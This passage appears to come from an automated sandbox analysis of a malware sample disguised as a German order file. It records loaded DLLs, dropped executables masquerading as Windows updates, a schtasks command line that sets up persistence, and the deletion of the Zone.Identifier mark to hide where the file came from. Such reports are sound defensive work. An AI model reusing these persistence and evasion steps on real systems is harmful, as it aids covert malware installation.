                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: dhcpcsvc6.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: dhcpcsvc.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: webio.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cabinet.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rasapi32.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rasman.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rtutils.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ondemandconnroutehelper.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: wbemcomn.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: amsi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeSection loaded: msasn1.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: mscoree.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: kernel.appcore.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: version.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: vcruntime140_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: ucrtbase_clr0400.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: uxtheme.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: windows.storage.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: wldp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: profapi.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptsp.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: rsaenh.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: cryptbase.dll
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeSection loaded: msasn1.dll
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: Bestellung - 021224 - 901003637.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: Bestellung - 021224 - 901003637.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                Source: Bestellung - 021224 - 901003637.exeStatic file information: File size 3842568 > 1048576
                Source: Bestellung - 021224 - 901003637.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x3a1a00
                Source: Bestellung - 021224 - 901003637.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.Bestellung - 021224 - 901003637.exe.7920000.2.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: 0.2.Bestellung - 021224 - 901003637.exe.4211d80.0.raw.unpack, L2.cs.Net Code: System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeCode function: 0_2_09803CD2 push FFFFFF8Bh; ret 0_2_09803CD4
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_08864DB0 push eax; iretd 15_2_08864DBD
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeFile created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeJump to dropped file
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeFile created: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeJump to dropped file

                Boot Survival

                barindex
                Uses schtasks.exe or at.exe to add and modify task schedules
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp"

                Hooking and other Techniques for Hiding and Protection

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeFile opened: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeFile opened: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeFile opened: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe:Zone.Identifier read attributes | delete
                Loading BitLocker PowerShell Module
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
